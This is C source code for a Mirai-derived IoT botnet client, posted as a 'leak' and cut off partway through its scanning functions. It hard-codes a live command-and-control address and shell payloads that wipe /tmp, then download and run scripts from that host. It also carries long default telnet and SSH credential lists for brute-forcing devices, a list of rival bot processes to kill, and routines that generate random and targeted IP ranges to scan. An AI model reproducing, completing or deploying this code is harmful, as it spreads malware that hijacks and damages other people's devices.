[ C ] Darks P2P (LEAK)

1. #include <stdlib.h>
2. #include <stdarg.h>
3. #include <stdio.h>
4. #include <sys/socket.h>
5. #include <sys/types.h>
6. #include <netinet/in.h>  
7. #include <arpa/inet.h>
8. #include <netdb.h>
9. #include <signal.h>                                                      
10. #include <strings.h>                                                      
11. #include <sys/utsname.h>
12. #include <unistd.h>
13. #include <fcntl.h>
14. #include <errno.h>
15. #include <netinet/ip.h>
16. #include <netinet/udp.h>
17. #include <netinet/tcp.h>
18. #include <sys/wait.h>
19. #include <sys/ioctl.h>
20. #include <net/if.h>
21. #include <time.h>
22. #include <dirent.h>
23. #include <limits.h>
24. #include <sys/stat.h>
25. #include <sys/time.h>
26. #include <string.h>
27. #include <stdint.h>
28. #include <stdio.h>
29. #include <sys/param.h>
30. #include <sys/time.h>
31. //mirai
32. #define INET_ADDR(o1,o2,o3,o4) (htonl((o1 << 24) | (o2 << 16) | (o3 << 8) | (o4 << 0)))
33. typedef uint32_t ipv4_t;
34. //end of mirai
35. #define PR_SET_NAME 15
36. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
37. #define PAD_RIGHT 1
38. #define PAD_ZERO 2
39. #define PRINT_BUF_LEN 12
40. #define CMD_IAC   255
41. #define CMD_WILL  251
42. #define CMD_WONT  252
43. #define CMD_DO    253
44. #define CMD_DONT  254
45. #define OPT_SGA   3
46. #define SOCKBUF_SIZE 1024
47. #define PHI 0x9e3779b9
48. char *getBuild() {
49.     #if defined(__x86_64__) || defined(_M_X64)
50.     return "x86_64";
51.     #elif defined(__i386) || defined(_M_IX86)
52.     return "x86_32";
53.     #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
54.     return "ARM-4";
55.     #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
56.     return "ARM-5"
57.     #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
58.     return "ARM-6";
59.     #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
60.     return "MIPS";
61.     #elif defined(__sh__)
62.     return "SUPERH";
63.     #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
64.     return "POWERPC";
65.     #else
66.     return "UNKNOWN";
67.     #endif
68. }
69. const char *useragents[] = {
70.     "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
71.     "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
72.     "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
73.     "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
74.     "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
75.     "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
76.     "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
77.     "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
78.     "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
79.     "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
80.     "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
81.     "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
82. };
83. struct telstate_t {
84.         int fd;
85.         unsigned int ip;
86.         unsigned char state;
87.         unsigned char complete;
88.         unsigned char usernameInd;  /* username     */
89.         unsigned char passwordInd;  /* password     */
90.         unsigned char tempDirInd;   /* tempdir      */
91.         unsigned int tTimeout;      /* tTimeout */
92.         unsigned short bufUsed;
93.         char *sockbuf;
94. };
95. int initConnection();
96. void makeRandomStr(unsigned char *buf, int length);
97. int sockprintf(int sock, char *formatStr, ...);
98. char *inet_ntoa(struct in_addr in);
99. int mainCommSock = 0, currentServer = -1;
100. uint32_t *pids;
101. uint32_t scanPid;
102. uint32_t bcmPid;
103. uint32_t testmiraiPid;
104. uint32_t testtelnetPid;
105. uint32_t scanPid;
106. uint32_t miraiPid;
107. uint16_t Phonepid;
108. uint64_t numpids = 0;
109. struct in_addr ourIP;
110. unsigned char macAddress[6] = {0};
111. unsigned char *commServer[] = { "89.34.99.155:52" };
112. int Server_Botport = 52;
113. char* phone[] = {":", "ogin", "sername", "assword", "Linux", "9615-cdp", (char*)0};
114. char *Busybox_Payload = "cd /tmp;rm -rf *; busybox wget http://89.34.99.155/fyfa.sh; chmod 777 fyfa.sh; sh fyfa.sh;busybox tftp 89.34.99.155 -c get tfyfa.sh; chmod 777 tfyfa.sh; sh tfyfa.sh;busybox tftp -r tfyfa2.sh -g 89.34.99.155; chmod 777 tfyfa2.sh; sh tfyfa2.sh; rm -rf fyfa.sh tfyfa.sh tfyfa2.sh; rm -rf fyfa*\r\n"; //Telnet Scanner Must implement Busybox.
115. char *Payload = "cd /tmp;rm -rf *;cd /tmp/;wget http://89.34.99.155/fyfa.sh;sh fyfa.sh;rm -rf fyfa.sh;cd /tmp/;wget http://89.34.99.155/fyfa.sh;sh fyfa.sh;rm -rf bis.sh"; //Normal Payload Without busybox Implemented.
116. char *phonepayload = "cd /tmp;rm -rf *;cd /tmp; wget http://89.34.99.155/fyfaarm -O phone; chmod 777 phone; ./phone;rm -rf phone\r\n";
117. char *Telnet_Usernames[] = {
118.     "telnet\0", //telnet:telnet
119.     "root\0", //root:
120.     "root\0", //root:1234
121. };
122. char *Telnet_Passwords[] = {
123.     "telnet\0", //telnet:telnet
124.     "\0", //root:1234
125.     "root\0", //root:1234
126. };
127. char *Mirai_Usernames[] = {
128.     "telnet\0"
129.     "root\0", //root:xc3511
130.     "root\0", //root:vizxv
131.     "root\0", //root:admin
132.     "admin\0", //admin:admin
133.     "root\0", //root:888888
134.     "root\0", //root:xmhdipc
135.     "root\0", //root:default
136.     "root\0", //root:juantech
137.     "root\0", //root:123456
138.     "root\0", //root:54321
139.     "support\0", //support:support
140.     "root\0", //root:(none)
141.     "admin\0", //admin:password
142.     "root\0", //root:root
143.     "root\0", //root:12345
144.     "user\0", //user:user
145.     "admin\0", //admin:(none)
146.     "root\0", //root:pass
147.     "admin\0", //admin:admin1234
148.     "root\0", //root:1111
149.     "admin\0", //admin:smcadmin
150.     "admin\0", //admin:1111
151.     "root\0", //root:666666
152.     "root\0", //root:password
153.     "root\0", //root:1234
154.     "root\0", //root:klv123
155.     "Administrator\0", //Administrator:admin
156.     "service\0", //service:service
157.     "supervisor\0", //supervisor:supervisor
158.     "guest\0", //guest:guest
159.     "guest\0", //guest:12345
160.     "guest\0", //guest:12345
161.     "admin1\0", //admin1:password
162.     "administrator\0", //administrator:1234
163.     "666666\0", //666666:666666
164.     "888888\0", //888888:888888
165.     "ubnt\0", //ubnt:ubnt
166.     "klv1234\0", //root:klv1234
167.     "Zte521\0", //root:Zte521
168.     "hi3518\0", //root:hi3518
169.     "jvbzd\0", //root:jvbzd
170.     "anko\0", //root:anko
171.     "zlxx\0", //root:zlxx
172.     "7ujMko0vizxv\0", //root:7ujMko0vizxv
173.     "7ujMko0admin\0", //root:7ujMko0admin
174.     "system\0", //root:system
175.     "ikwb\0", //root:ikwb
176.     "dreambox\0", //root:dreambox
177.     "user\0", //root:user
178.     "realtek\0", //root:realtek
179.     "00000000\0", //root:00000000
180.     "1111111\0", //admin:1111111
181.     "1234\0", //admin:1234
182.     "12345\0", //admin:12345
183.     "54321\0", //admin:54321
184.     "123456\0", //admin:123456
185.     "7ujMko0admin\0", //admin:7ujMko0admin
186.     "1234\0", //admin:1234
187.     "pass\0", //admin:pass
188.     "meinsm\0", //admin:meinsm
189.     "tech\0", //tech:tech
190.     "fucker\0", //mother:fucker
191.     "pi\0", //mother:fucker
192. };
193. char *Mirai_Passwords[] = {
194.     "telnet\0"
195.     "xc3511\0", //root:xc3511
196.     "vizxv\0", //root:vizxv
197.     "admin\0", //root:admin
198.     "admin\0", //admin:admin
199.     "888888\0", //root:888888
200.     "xmhdipc\0", //root:xmhdipc
201.     "default\0", //root:default
202.     "juantech\0", //root:juantech
203.     "123456\0", //root:123456
204.     "54321\0", //root:54321
205.     "support\0", //support:support
206.     "\0", //root:(none)
207.     "password\0", //admin:password
208.     "root\0", //root:root
209.     "12345\0", //root:12345
210.     "user\0", //user:user
211.     "\0", //admin:(none)
212.     "pass\0", //root:pass
213.     "admin1234\0", //admin:admin1234
214.     "1111\0", //root:1111
215.     "smcadmin\0", //admin:smcadmin
216.     "1111\0", //admin:1111
217.     "666666\0", //root:666666
218.     "password\0", //root:password
219.     "1234\0", //root:1234
220.     "klv123\0", //root:klv123
221.     "admin\0", //Administrator:admin
222.     "service\0", //service:service
223.     "supervisor\0", //supervisor:supervisor
224.     "guest\0", //guest:guest
225.     "12345\0", //guest:12345
226.     "123456\0", //guest:12345
227.     "password\0", //admin1:password
228.     "1234\0", //administrator:1234
229.     "666666\0", //666666:666666
230.     "888888\0", //888888:888888
231.     "ubnt\0", //ubnt:ubnt
232.     "klv1234\0", //root:klv1234
233.     "Zte521\0", //root:Zte521
234.     "hi3518\0", //root:hi3518
235.     "jvbzd\0", //root:jvbzd
236.     "anko\0", //root:anko
237.     "zlxx\0", //root:zlxx
238.     "7ujMko0vizxv\0", //root:7ujMko0vizxv
239.     "7ujMko0admin\0", //root:7ujMko0admin
240.     "system\0", //root:system
241.     "ikwb\0", //root:ikwb
242.     "dreambox\0", //root:dreambox
243.     "user\0", //root:user
244.     "realtek\0", //root:realtek
245.     "00000000\0", //root:00000000
246.     "1111111\0", //admin:1111111
247.     "1234\0", //admin:1234
248.     "12345\0", //admin:12345
249.     "54321\0", //admin:54321
250.     "123456\0", //admin:123456
251.     "7ujMko0admin\0", //admin:7ujMko0admin
252.     "1234\0", //admin:1234
253.     "pass\0", //admin:pass
254.     "meinsm\0", //admin:meinsm
255.     "tech\0", //tech:tech
256.     "fucker\0", //mother:fucker
257.     "raspberry\0", //mother:fucker
258.    
259. };
260. char *SSH_Usernames[] = {
261.     "root\0", //root:root
262.     "admin\0", //admin:admin
263.     "admin\0", //admin:1234
264.     "ubnt\0", //ubnt:ubnt
265.     "pi\0", //mother:fucker
266. };
267. char *SSH_Passwords[] = {
268.     "root\0", //root:root
269.     "admin\0", //admin:admin
270.     "1234\0", //admin:1234
271.     "ubnt\0", //ubnt:ubnt
272.     "raspberry\0", //mother:fucker
273. };
274. char *Bot_Killer_Binarys[] = {
275.     "mips",
276.     "mipsel",
277.     "sh4",
278.     "x86",
279.     "i686",
280.     "ppc",
281.     "i586",
282.     "i586",
283.     "jack*",
284.     "hack*",
285.     "arm*"
286.     "tel*"
287.     "b1",
288.     "b2",
289.     "b3",
290.     "b4",
291.     "b5",
292.     "b6",
293.     "b7",
294.     "b8",
295.     "b9",
296.     "lol*",
297.     "busybox*",
298.     "badbox*",
299.     "DFhxdhdf",
300.     "dvrHelper",
301.     "FDFDHFC",
302.     "FEUB",
303.     "FTUdftui",
304.     "GHfjfgvj",
305.     "jhUOH",
306.     "JIPJIPJj",
307.     "JIPJuipjh",
308.     "kmyx86_64",
309.     "lolmipsel",
310.     "mips",
311.     "mipsel",
312.     "RYrydry",
313.     "TwoFace*",
314.     "UYyuyioy",
315.     "wget",
316.     "x86_64",
317.     "XDzdfxzf",
318.     "xx*",
319.     "sh",
320.     "1",
321.     "2",
322.     "3",
323.     "4",
324.     "5",
325.     "6",
326.     "7",
327.     "8",
328.     "9",
329.     "10",
330.     "11",
331.     "12",
332.     "13",
333.     "14",
334.     "15",
335.     "16",
336.     "17",
337.     "18",
338.     "19",
339.     "20",
340.     "busybox",
341.     "badbox",
342.     "Mirai*",
343.     "mirai*",
344.     "cunty*",
345.     "IoT*",
346.     "pl0*",
347.     "cc*"
348.     };
349. char *Temp_Directorys[] = {"/tmp/*", "/var/*", "/var/run/*", "/var/tmp/*",  (char*) 0};
350. char *advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};                                                                                    
351. char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};                                                       
352. char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};                                                                                                  
353. char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
354. static uint32_t Q[4096], c = 362436;
355. void init_rand(uint32_t x) {
356.         int i;
357.         Q[0] = x;
358.         Q[1] = x + PHI;
359.         Q[2] = x + PHI + PHI;
360.         for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
361. }
362. uint32_t rand_cmwc(void) {
363.         uint64_t t, a = 18782LL;
364.         static uint32_t i = 4095;
365.         uint32_t x, r = 0xfffffffe;
366.         i = (i + 1) & 4095;
367.         t = a * Q[i] + c;
368.         c = (uint32_t)(t >> 32);
369.         x = t + c;
370.         if (x < c) {
371.                 x++;
372.                 c++;
373.         }
374.         return (Q[i] = r - x);
375. }
376. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
377. {
378. int got = 1, total = 0;
379. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
380. return got == 0 ? NULL : buffer;
381. }
382. int contains_string(char* buffer, char** strings) {
383.         int num_strings = 0, i = 0;
384.         for(num_strings = 0; strings[++num_strings] != 0; );
385.         for(i = 0; i < num_strings; i++) {
386.                 if(strcasestr(buffer, strings[i])) {
387.                         return 1;
388.                 }
389.         }
390.         return 0;
391. }
392. int contains_success(char* buffer) {
393.         return contains_string(buffer, successes);
394. }
395. int contains_fail(char* buffer) {
396.         return contains_string(buffer, fails);
397. }
398. int contains_response(char* buffer) {
399.         return contains_success(buffer) || contains_fail(buffer);
400. }
401. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {      
402.         fd_set read_set;
403.         struct timeval tv;
404.         tv.tv_sec = 0;
405.         tv.tv_usec = timeout_usec;
406.         FD_ZERO(&read_set);
407.         FD_SET(fd, &read_set);
408.         if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
409.         return 0;
410.         return recv(fd, buffer, buf_size, 0);
411. }
412. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
413.         int num_bytes, i;
414.         memset(buffer, 0, buf_size);
415.         num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
416.         if(buffer[0] == 0xFF) {
417.                 negotiate(fd, buffer, 3);
418.         }
419.         if(contains_string(buffer, strings)) {
420.                 return 1;
421.         }
422.         return 0;
423. }
424. const char* get_telstate_host(struct telstate_t* telstate) { // get host
425.         struct in_addr in_addr_ip;
426.         in_addr_ip.s_addr = telstate->ip;
427.         return inet_ntoa(in_addr_ip);
428. }
429. void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
430.         if(new_state == 0) {
431.                 close(telstate->fd);
432.         }
433.         telstate->tTimeout = 0;
434.         telstate->state = new_state;
435.         memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
436. }
437. void reset_telstate(struct telstate_t* telstate) { // reset
438.         advance_telstate(telstate, 0);
439.         telstate->complete = 1;
440. }
441. void trim(char *str) {
442.         int i;
443.         int begin = 0;
444.         int end = strlen(str) - 1;
445.         while (isspace(str[begin])) begin++;
446.         while ((end >= begin) && isspace(str[end])) end--;
447.         for (i = begin; i <= end; i++) str[i - begin] = str[i];
448.         str[i - begin] = '\0';
449. }
450. static void printchar(unsigned char **str, int c) {
451.         if (str) {
452.                 **str = c;
453.                 ++(*str);
454.         }
455.         else (void)write(1, &c, 1);
456. }
457. static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
458.         register int pc = 0, padchar = ' ';
459.         if (width > 0) {
460.                 register int len = 0;
461.                 register const unsigned char *ptr;
462.                 for (ptr = string; *ptr; ++ptr) ++len;
463.                 if (len >= width) width = 0;
464.                 else width -= len;
465.                 if (pad & PAD_ZERO) padchar = '0';
466.         }
467.         if (!(pad & PAD_RIGHT)) {
468.                 for ( ; width > 0; --width) {
469.                         printchar (out, padchar);
470.                         ++pc;
471.                 }
472.         }
473.         for ( ; *string ; ++string) {
474.                 printchar (out, *string);
475.                 ++pc;
476.         }
477.         for ( ; width > 0; --width) {
478.                 printchar (out, padchar);
479.                 ++pc;
480.         }
481.         return pc;
482. }
483. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
484.         unsigned char print_buf[PRINT_BUF_LEN];
485.         register unsigned char *s;
486.         register int t, neg = 0, pc = 0;
487.         register unsigned int u = i;
488.         if (i == 0) {
489.                 print_buf[0] = '0';
490.                 print_buf[1] = '\0';
491.                 return prints (out, print_buf, width, pad);
492.         }
493.         if (sg && b == 10 && i < 0) {
494.                 neg = 1;
495.                 u = -i;
496.         }
497.         s = print_buf + PRINT_BUF_LEN-1;
498.         *s = '\0';
499.         while (u) {
500.                 t = u % b;
501.                 if( t >= 10 )
502.                 t += letbase - '0' - 10;
503.                 *--s = t + '0';
504.                 u /= b;
505.         }
506.         if (neg) {
507.                 if( width && (pad & PAD_ZERO) ) {
508.                         printchar (out, '-');
509.                         ++pc;
510.                         --width;
511.                 }
512.                 else {
513.                         *--s = '-';
514.                 }
515.         }
516.         return pc + prints (out, s, width, pad);
517. }
518. static int print(unsigned char **out, const unsigned char *format, va_list args ) {
519.         register int width, pad;
520.         register int pc = 0;
521.         unsigned char scr[2];
522.         for (; *format != 0; ++format) {
523.                 if (*format == '%') {
524.                         ++format;
525.                         width = pad = 0;
526.                         if (*format == '\0') break;
527.                         if (*format == '%') goto out;
528.                         if (*format == '-') {
529.                                 ++format;
530.                                 pad = PAD_RIGHT;
531.                         }
532.                         while (*format == '0') {
533.                                 ++format;
534.                                 pad |= PAD_ZERO;
535.                         }
536.                         for ( ; *format >= '0' && *format <= '9'; ++format) {
537.                                 width *= 10;
538.                                 width += *format - '0';
539.                         }
540.                         if( *format == 's' ) {
541.                                 register char *s = (char *)va_arg( args, int );
542.                                 pc += prints (out, s?s:"(null)", width, pad);
543.                                 continue;
544.                         }
545.                         if( *format == 'd' ) {
546.                                 pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
547.                                 continue;
548.                         }
549.                         if( *format == 'x' ) {
550.                                 pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
551.                                 continue;
552.                         }
553.                         if( *format == 'X' ) {
554.                                 pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
555.                                 continue;
556.                         }
557.                         if( *format == 'u' ) {
558.                                 pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
559.                                 continue;
560.                         }
561.                         if( *format == 'c' ) {
562.                                 scr[0] = (unsigned char)va_arg( args, int );
563.                                 scr[1] = '\0';
564.                                 pc += prints (out, scr, width, pad);
565.                                 continue;
566.                         }
567.                 }
568.                 else {
569. out:
570.                         printchar (out, *format);
571.                         ++pc;
572.                 }
573.         }
574.         if (out) **out = '\0';
575.         va_end( args );
576.         return pc;
577. }
578. int zprintf(const unsigned char *format, ...) {
579.         va_list args;
580.         va_start( args, format );
581.         return print( 0, format, args );
582. }
583. int szprintf(unsigned char *out, const unsigned char *format, ...) {
584.         va_list args;
585.         va_start( args, format );
586.         return print( &out, format, args );
587. }
588. int sockprintf(int sock, char *formatStr, ...) {
589.         unsigned char *textBuffer = malloc(2048);
590.         memset(textBuffer, 0, 2048);
591.         char *orig = textBuffer;
592.         va_list args;
593.         va_start(args, formatStr);
594.         print(&textBuffer, formatStr, args);
595.         va_end(args);
596.         orig[strlen(orig)] = '\n';
597.         zprintf("%s\n", orig);
598.         int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
599.         free(orig);
600.         return q;
601. }
602. int wildString(const unsigned char* pattern, const unsigned char* string) {
603.         switch(*pattern) {
604.         case '\0': return *string;
605.         case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
606.         case '?': return !(*string && !wildString(pattern+1, string+1));
607.         default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
608.         }
609. }
610. int getHost(unsigned char *toGet, struct in_addr *i) {
611.         struct hostent *h;
612.         if((i->s_addr = inet_addr(toGet)) == -1) return 1;
613.         return 0;
614. }
615. void makeRandomStr(unsigned char *buf, int length) {
616.         int i = 0;
617.         for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
618. }
619. int recvLine(int socket, unsigned char *buf, int bufsize) {
620.         memset(buf, 0, bufsize);
621.         fd_set myset;
622.         struct timeval tv;
623.         tv.tv_sec = 30;
624.         tv.tv_usec = 0;
625.         FD_ZERO(&myset);
626.         FD_SET(socket, &myset);
627.         int selectRtn, retryCount;
628.         if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
629.                 while(retryCount < 10) {
630.                         tv.tv_sec = 30;
631.                         tv.tv_usec = 0;
632.                         FD_ZERO(&myset);
633.                         FD_SET(socket, &myset);
634.                         if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
635.                                 retryCount++;
636.                                 continue;
637.                         }
638.                         break;
639.                 }
640.         }
641.         unsigned char tmpchr;
642.         unsigned char *cp;
643.         int count = 0;
644.         cp = buf;
645.         while(bufsize-- > 1) {
646.                 if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
647.                         *cp = 0x00;
648.                         return -1;
649.                 }
650.                 *cp++ = tmpchr;
651.                 if(tmpchr == '\n') break;
652.                 count++;
653.         }
654.         *cp = 0x00;
655.         return count;
656. }
657. int connectTimeout(int fd, char *host, int port, int timeout) {
658.         struct sockaddr_in dest_addr;
659.         fd_set myset;
660.         struct timeval tv;
661.         socklen_t lon;
662.         int valopt;
663.         long arg = fcntl(fd, F_GETFL, NULL);
664.         arg |= O_NONBLOCK;
665.         fcntl(fd, F_SETFL, arg);
666.         dest_addr.sin_family = AF_INET;
667.         dest_addr.sin_port = htons(port);
668.         if(getHost(host, &dest_addr.sin_addr)) return 0;
669.         memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
670.         int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
671.         if (res < 0) {
672.                 if (errno == EINPROGRESS) {
673.                         tv.tv_sec = timeout;
674.                         tv.tv_usec = 0;
675.                         FD_ZERO(&myset);
676.                         FD_SET(fd, &myset);
677.                         if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
678.                                 lon = sizeof(int);
679.                                 getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
680.                                 if (valopt) return 0;
681.                         }
682.                         else return 0;
683.                 }
684.                 else return 0;
685.         }
686.         arg = fcntl(fd, F_GETFL, NULL);
687.         arg &= (~O_NONBLOCK);
688.         fcntl(fd, F_SETFL, arg);
689.         return 1;
690. }
691. int listFork() {
692.         uint32_t parent, *newpids, i;
693.         parent = fork();
694.         if (parent <= 0) return parent;
695.         numpids++;
696.         newpids = (uint32_t*)malloc((numpids + 1) * 4);
697.         for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
698.         newpids[numpids - 1] = parent;
699.         free(pids);
700.         pids = newpids;
701.         return parent;
702. }
703. int negotiate(int sock, unsigned char *buf, int len) {
704.         unsigned char c;
705.         switch (buf[1]) {
706.         case CMD_IAC: return 0;
707.         case CMD_WILL:
708.         case CMD_WONT:
709.         case CMD_DO:
710.         case CMD_DONT:
711.                 c = CMD_IAC;
712.                 send(sock, &c, 1, MSG_NOSIGNAL);
713.                 if (CMD_WONT == buf[1]) c = CMD_DONT;
714.                 else if (CMD_DONT == buf[1]) c = CMD_WONT;
715.                 else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
716.                 else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
717.                 send(sock, &c, 1, MSG_NOSIGNAL);
718.                 send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
719.                 break;
720.         default:
721.                 break;
722.         }
723.         return 0;
724. }
725. int matchPrompt(char *bufStr) {
726.         char *prompts = ":>%$#\0";
727.         int bufLen = strlen(bufStr);
728.         int i, q = 0;
729.         for(i = 0; i < strlen(prompts); i++) {
730.                 while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
731.                 if(*(bufStr + bufLen - q) == prompts[i]) return 1;
732.         }
733.         return 0;
734. }
735. uint8_t ipState[5] = {0};
736. in_addr_t getRandomPublicIP() {
737.         ipState[0] = rand() % 223;
738.         ipState[1] = rand() % 255;
739.         ipState[2] = rand() % 255;
740.         ipState[3] = rand() % 255;
741.         while(
742.                 (ipState[0] == 0) ||
743.                 (ipState[0] == 10) ||
744.                 (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
745.                 (ipState[0] == 127) ||
746.                 (ipState[0] == 169 && ipState[1] == 254) ||
747.                 (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
748.                 (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
749.                 (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
750.                 (ipState[0] == 192 && ipState[1] == 168) ||
751.                 (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
752.                 (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
753.                 (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
754.                 (ipState[0] >= 224)
755.         )
756.         {
757.                 ipState[0] = rand() % 223;
758.                 ipState[1] = rand() % 255;
759.                 ipState[2] = rand() % 255;
760.                 ipState[3] = rand() % 255;
761.         }
762.         char ip[16] = {0};
763.         szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
764.         return inet_addr(ip);
765. }
766. in_addr_t BCMSCAN()
767. {
768. ipState[0] = 0;
769. ipState[1] = 0;
770. ipState[2] = 0;
771. ipState[3] = 0;
772. ipState[0] = rand() % 255;
773. ipState[1] = rand() % 255;
774. ipState[2] = rand() % 255;
775. ipState[3] = rand() % 255;
776. int randnum = rand() % 37;
777. char ip[16];
778. if(randnum == 0)
779. {
780. szprintf(ip, "37.11.%d.%d", ipState[2], ipState[3]);
781. }
782. if(randnum == 1)
783. {
784. szprintf(ip, "146.158.%d.%d", ipState[2], ipState[3]);
785. }
786. if(randnum == 2)
787. {
788. szprintf(ip, "185.4.%d.%d", ipState[2], ipState[3]);
789. }
790. if(randnum == 3)
791. {
792. szprintf(ip, "188.76.%d.%d", ipState[2], ipState[3]);
793. }
794. if(randnum == 4)
795. {
796. szprintf(ip, "188.77.%d.%d", ipState[2], ipState[3]);
797. }
798. if(randnum == 5)
799. {
800. szprintf(ip, "188.78.%d.%d", ipState[2], ipState[3]);
801. }
802. if(randnum == 6)
803. {
804. szprintf(ip, "188.79.%d.%d", ipState[2], ipState[3]);
805. }
806. if(randnum == 7)
807. {
808. szprintf(ip, "212.106.%d.%d", ipState[2], ipState[3]);
809. }
810. if(randnum == 8)
811. {
812. szprintf(ip, "212.9.%d.%d", ipState[2], ipState[3]);
813. }
814. if(randnum == 9)
815. {
816. szprintf(ip, "213.179.%d.%d", ipState[2], ipState[3]);
817. }
818. if(randnum == 10)
819. {
820. szprintf(ip, "37.11.%d.%d", ipState[2], ipState[3]);
821. }
822. if(randnum == 11)
823. {
824. szprintf(ip, "37.132.%d.%d", ipState[2], ipState[3]);
825. }
826. if(randnum == 12)
827. {
828. szprintf(ip, "37.133.%d.%d", ipState[2], ipState[3]);
829. }
830. if(randnum == 13)
831. {
832. szprintf(ip, "37.134.%d.%d", ipState[2], ipState[3]);
833. }
834. if(randnum == 14)
835. {
836. szprintf(ip, "37.135.%d.%d", ipState[2], ipState[3]);
837. }
838. if(randnum == 15)
839. {
840. szprintf(ip, "37.14.%d.%d", ipState[2], ipState[3]);
841. }
842. if(randnum == 16)
843. {
844. szprintf(ip, "37.15.%d.%d", ipState[2], ipState[3]);
845. }
846. if(randnum == 17)
847. {
848. szprintf(ip, "37.35.%d.%d", ipState[2], ipState[3]);
849. }
850. if(randnum == 18)
851. {
852. szprintf(ip, "37.97.%d.%d", ipState[2], ipState[3]);
853. }
854. if(randnum == 19)
855. {
856. szprintf(ip, "62.14.%d.%d", ipState[2], ipState[3]);
857. }
858. if(randnum == 20)
859. {
860. szprintf(ip, "87.216.%d.%d", ipState[2], ipState[3]);
861. }
862. if(randnum == 21)
863. {
864. szprintf(ip, "87.217.%d.%d", ipState[2], ipState[3]);
865. }
866. if(randnum == 22)
867. {
868. szprintf(ip, "87.218.%d.%d", ipState[2], ipState[3]);
869. }
870. if(randnum == 23)
871. {
872. szprintf(ip, "87.219.%d.%d", ipState[2], ipState[3]);
873. }
874. if(randnum == 24)
875. {
876. szprintf(ip, "87.220.%d.%d", ipState[2], ipState[3]);
877. }
878. if(randnum == 25)
879. {
880. szprintf(ip, "87.221.%d.%d", ipState[2], ipState[3]);
881. }
882. if(randnum == 26)
883. {
884. szprintf(ip, "87.222.%d.%d", ipState[2], ipState[3]);
885. }
886. if(randnum == 27)
887. {
